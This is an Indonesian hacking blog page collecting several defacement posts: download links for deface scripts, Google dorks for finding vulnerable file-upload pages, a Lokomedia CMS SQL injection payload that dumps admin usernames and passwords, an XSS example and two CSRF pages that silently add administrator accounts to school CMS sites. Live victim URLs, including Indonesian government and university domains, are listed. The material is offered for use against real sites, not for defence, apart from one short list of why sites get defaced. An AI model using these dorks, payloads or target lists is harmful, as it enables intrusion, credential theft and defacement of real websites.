Download Script Deface Milik ./Maniak_WiFi - Pringsewu Cyber Team

Download Script Deface Milik ./Maniak_WiFi - Pringsewu Cyber Team

Salam,,, Udah Sore ini enaknya posting apaan yah, kagax ada materi yang mau di posting, bingunggg wkwkwkwkw, eeemmm posting script gw aja dah, sapa tau bisa jadi referensi ente untuk buat script deface hash ente :D 

Script Deface yang gw buat ini enak kok dipahami, susunan codenya rapih teratur dan familiar, dijamin puas dah buat elu para copas, tinggal edit dikitttt, slesai deh :D

Download Script Deface

Silahkan ente download script codenya dibawah ini yah, semoga bermanfaat.

1. Script Deface Maniak WiFi - V1

Download : [ Google Drive ] [ Zippy Share ]

2. Script Deface Maniak WiFi - V2

Download Script Deface Milik ./Maniak_WiFi - Pringsewu Cyber Team

Download : [ Google Drive ] [ Zippy Share ]

3. Script Deface Maniak WiFi - V3 [SMK Yasmida Cyber Art]

Download Script Deface Milik ./Maniak_WiFi - SMK Yasmida Cyber Art

Download : [ Google Drive ] [ Zippy Share ]

4. Script Deface Maniak WiFi - V4

Download Script Deface Milik ./Maniak_WiFi - Pringsewu Cyber Team

Download : [ Google Drive ] [ Zippy Share ]

Oke itulah script yang bisa saya bagikan,semoga bermanfaat, jangan lupa sertakan nick ane yahh buat hargai pembuat.

Nick : ./Maniak_WiFi

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti

>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team

// Why So Serious...

Faktor Penyebab Website Kena Deface

Faktor Penyebab Website Kena Deface

Selamat siang para Maniak WiFi kali ini saya akan share info yang barang kali tidak penting, hhh ini hasil copas yah,, karena saya males ngetik,, tapi nanti sumbernya saya tarok dibawah dah biar seneng tuh. ini adalah beberapa faktor kenapa website kok bisa kedeface, kan gx punya akses dari admin untuk masuk ke sistemnya.

Faktor Penyebab Website Kena Deface

Deface Adalah : Pengertian Deface Website

Beberapa Faktor Penyebab Website Kena Deface

• Penggunaan free CMS dan open source tanpa adanya modification. Keseluruhan konfigurasi menggunanakan default konfigurasi, akan memudahkan para defacer untuk menemukan informasi file, directory, source, database, user, connection, dsb. Bagi para blogger apalagi yang masih newbie melakukan modifikasi konfigurasi engine blog bukanlah merupakan hal yang mudah. Namun tak ada salahnya kita meluangkan waktu mencari berbagai pedoman dan mungkin bisa juga dengan melakukan instalasi plugin untuk keamanan wordpress seperti  wp firewall, login lock down, stealth login, dan plugin lainnya untuk keamanan blog.
• Tidak updatenya source atau tidak menggunakan versi terakhir dari CMS. Hal ini sangat ini rentan, karena security issue terus berkembang seiring masuknya laporan dan bugtrack terhadap source, kebanyakan hal inilah yang menjadi sebab website mudah dideface. Oleh karena hal itu  diputuskan untuk melakukan upgrade pada blog.
• Tidak adanya ada research yang mendalam dan detail mengenai CMS sebelum digunakan & diimplementasikan. Sehingga pemahaman dan pengetahuan dari webmaster hanya dari sisi administrasinya saja, tidak sampai ke level pemahaman sourcecode.
• Tidak adanya audit trail atau log yang memberikan informasi lengkap mengenai penambahan, pengurangan, perubahan, yang terjadi di website baik source, file, directory, dsb. Sehingga kesulitan untuk menemukan, memperbaiki dan menghapus backdoor yang sudah masuk di website.
• Jarang melakukan pengecekan terhadap security update, jarang mengunjungi dan mengikuti perkembangan yang ada di situs-situs security jagad maya. Sehingga website sudah keduluan di deface oleh sebelum dilakukan update dan patch oleh webmaster.
• Kurangnya security awareness dari masing-masing personel webmaster & administrator. Sehingga kewaspadaan terhadap celah-celah keamanan cukup minim, kadangkala setelah website terinstall  dibiarkan begitu saja. Kurangnya training dan kesadaraan akan keamanan website seperti ini akan menjadikan website layaknya sebuah istana yang tak punya benteng.

Sumber : https://apriyandis.wordpress.com/2013/11/20/pengertian-deface-dan-contoh-kasus-di-indonesia/

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti

>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team

// Why So Serious...

Pengertian Deface dan Jenis - Jenis Deface

Deface Website Adalah ... ?

Deface yang berdasarkan kamus Umum berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama  atau index filenya ataupun halaman lain yang masih terkait dalam satu  url dengan website tersebut (bisa di folder atau di file).

Pengertian Deface dan Jenis - Jenis Deface

Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.

Jenis-Jenis pen-Deface

Deface dapat dibagi menjadi dua jenis berdasarkan dampak pada halaman situs yang terkena serangan terkait.

a. Full of page

Artinya mendeface satu halaman penuh tampilan depan alias file index atau file lainnya yang akan diubah  secara utuh, artinya untuk melakukan ini biasanya  seorang ‘defacer’ umumnya harus berhubungan secara ‘langsung’ dengan box (mesin) atau usaha mendapatkan priveleged terhadap mesin, baik itu root account atau sebagainya yang memungkinkan defacer dapat secara Interaktif mengendalikan file indek dan lainnya secara utuh. Umumnya dengan memanfaatkan kelemahan kelemahan pada services-services yang berjalan di mesin, sehingga dapat melakukan pengaksesan ke mesin.

b. Sebagian atau hanya menambahi

Artinya, defacer mendeface suatu situs tidak secara penuh, bisa hanya dengan menampilkan beberapa kata, gambar atau penambahan script-script yang mengganggu, hal ini umumnya hanya akan memperlihatkan tampilan file yang di deface menjadi kacau dan umumnya cukup mengganggu, defacer biasanya mencari celah baik dari kelemahan scripting yang digunakan dengan XSS injection, bisa dengan SQL atau database injection dan juga beberapa vulnerabilities yang seringkali ditemukan pada situs-situs yang dibangun dengan  menggunakan CMS  (Content Manajemen System).

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti

>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team

// Why So Serious...

Deface Website Metode File Upload Manger v1.3 Rename To

Deface Website Metode File Upload Manger v1.3 Rename To

Ok saya rasa tidak perlu dijelaskan, karena gx ada yg perlu diperhatikan disini, tinggal set set set :p

Deface Website Metode File Upload Manger v1.3 Rename To

Dork :

intitle:File Upload Manager v1.3
"File Upload Manager v1.3" "rename to" "file types allowed"

silahkan dikembangkan dengan kemampuan vokep kalian :D

Cara Deface Website :

1. Copy dork dan paste and search di Browser google

2. Akan muncul banyak Target dan jika target itu vuln akan tampil seperti dibawah ini.

Deface Website Metode File Upload Manger v1.3 Rename To

3. untuk upload, klik Choose File dan pilih script atau file yang sudah anda siapkan, untuk Type file bisa dilihat di tanda panah itu,, (gif, jpg, png dll)

4. Jika sudah dipilih sekaran klik UPLOAD.

5. Jika file berhasil diupload akan muncul dibawah form tersebut.

Live Target

http://ftpprzemo93c.cba.pl/fileupload/

http://prakan.sangkhahospital.com/fileupload/

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti

>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team

// Why So Serious...

[Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability

[Exploit] Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

###########################

# Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

###########################

[Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability

=========================================================

[+] Title :- Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability

[+] Vendor Homepage :- http://www.bukulokomedia.com/

[+] Version :- All Versions

[+] Tested on :- Linux - Windows - Mac

[+] Category :- webapps

[+] Exploit Author :- K33P-S1L3NT

[+] Team name :- Ternate Lab Pentesting

[+] Official Page :- www.facebook.com/loading.gov/

[+] Available :- sql injection cheat sheet | sql injection Remote exploit

[+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka | DZ hacker's | Algerian Hack 

[+] Contact :- aurorakoizora@gmail.com

=========================================================

[+] Severity Level :- Medium

[+] Request Method(s) :- GET / POST

[+] Vulnerable Parameter(s) :- id,

      statis-1-profil.html (string ) 

      statis-3-strukturorganisasi.html (string )

      statis-1-visimisi.html (string)

      statis-1-tujuan.html  (string)

[+] Dork : - 

      statis-1-profil.html (work100% ) 

      statis-3-strukturorganisasi.html (work100% )

      statis-1-visimisi.html (work100%)

      statis-1-tujuan.html  (work100%)

[+] Local Admin 

     /redaktur

     /adminweb

     /administrator

     /redaktur/index.php

     /adminlogin

     /admin

     /login.php

[+] Affected Area(s) :- Entire admin, database, Server

[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File :- /home/user/public_html/XXX.php

[+] POC : http://127.0.0.1/statis-1( exploit-code )profil.html

              - http://127.0.0.1/statis-3( exploit-code )strukturorganisasi.html

              - http://127.0.0.1/statis-1( exploit-code )visimisi.html

              - http://127.0.0.1/statis-1( exploit-code )tujuan.html

########################################################

[+] Exploit 

/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

##########################################################

[+] Testing 

http://127.0.0.1/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html

[+] NOTE 

 username & password open on title-bar  or  CTRL+U for view username & password this website exploit

###########################################################

[+] LIVE 

http://portal.ukit.ac.id ( Title-bar  http://i.imgur.com/mYXPvpG.png ) ( CRTL+U http://i.imgur.com/2zKzC5o.png )

http://www.ptun-padang.go.id ( Title-bar http://i.imgur.com/3ZdoHaI.png ) ( CTRL+U http://i.imgur.com/eX1qKc5.png )

http://www.anambaskab.go.id ( Title-bar http://i.imgur.com/o4gQd0o.png ) ( CTRL+U http://i.imgur.com/WOriRul.png )

Semoga Bermanfaat :D

Sumber : 

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti

>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team

// Why So Serious...

Exploit CMS Schoolhos 2017 | CSRF Vulnerability

Exploit CMS Schoolhos 2017 | CSRF Vulnerability

Selamat datang di blog maniak wifi, kali ini kita belajar CSRF kembali, yaitu CSRF CMS Schoolhos dengan mudah, karena kita menggunakan bantuan Dork.

Exploit CMS Schoolhos 2017 | CSRF Vulnerability

=================

Dork Schoolhos

=================

Google Dork: 

inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS

==========================

CSRF CMS Schoolhos

==========================

<?php

$self = $_SERVER["PHP_SELF"];

echo 'Target';

echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";

if(!isset($_GET['url'])){

$url = "http://target.com/adminpanel/database/admin.php";

}else

{

$url = $_GET['url'];

}

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<html>

 <head>

  <title>!!Barrabravaz Everywhere!!</title>

 </head>

 <body>

<h1>!!Barrabravaz Everywhere!!</h1>

<?php echo "Target is : $url"; ?>

<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">

Isi username yang mau di isi <INPUT type="text"  name="username" value="barrabravaz"><br>

Pass nya<INPUT type="text"  name="password" value="barrabravaz"><br>

<input type="submit" name="insert" value="Insert" >

</form>

</body>

</html> 

========================================

Jangan dirubah-rubah iya,, hargai yang buat tools :D

========================================

Semoga Bermanfaat :D

Sumber : http://alamshahcyber.blogspot.co.id/2014/07/tutorial-hack-situs-sekolah-cms_9.html

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti

>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team

// Why So Serious...

Exploit CMS Formulasi 2017 | CSRF Vulnerability

Exploit CMS Formulasi 2017 | CSRF Vulnerability

Selamat siang para penduduk internet, terima kasih sudah berkunjung ke blog sederhana ini, semoga bermanfaat, kali ini kita akan belajar exploit cms formulasi dengan menggunakan CSRF yang ada dibawah ini, semoga succes :D

Exploit CMS Formulasi 2017 | CSRF Vulnerability

========================

SQL Injection

========================

Found on

http://localhost/formulasi/kelas-siswa.html 

parameter : kelas

post data : kelas=1{SQL_HERE}

========================

XSS Vulnerability

========================

Found On

parameter : tgl

http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>

========================

CSRF Vulnerability

========================

---------------------BOF--------------------------------------------------

<html>

<head>

<title>Formulasi CRSFT Exploit</title>

</head>

<body onload="javascript:fireForms()">

<script language="JavaScript">

var pauses = new Array( "489","36","27" );

function pausecomp(millis)

{

    var date = new Date();

    var curDate = null;

    do { curDate = new Date(); }

    while(curDate-date < millis);

}

function fireForms()

{

    var count = 3;

    var i=0;

     

    for(i=0; i<count; i++)

    {

        document.forms[i].submit();

         

        pausecomp(pauses[i]);

    }

}

</script>

<H2>Formulasi CSRF Exploit</H2>

<form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah">

<input type="hidden" name="nama_admin" value="usernya"/>

<input type="hidden" name="username" value="Sarahma12"/>

<input type="hidden" name="email" value="research@sarahma.co.id"/>

<input type="hidden" name="level_users" value="1"/>

<input type="hidden" name="password" value="Password12"/>

<input type="hidden" name="password_lagi" value="Password12"/>

</form>

</body>

</html>

---------------------EOF--------------------------------------------------

========================

Solution :

========================

No Update Until This Advisory published

========================

Timeline:

========================

2013-09-27 Provided details vulnerability to vendor

2013-10-01 Second NotificaTon Vendor

2013-10-04 No Response From Vendor

Sumber : https://www.exploit-db.com/

Terima kasih sudah berkunjung ke Blog ini semoga bermanfaat.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti

>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team

// Why So Serious...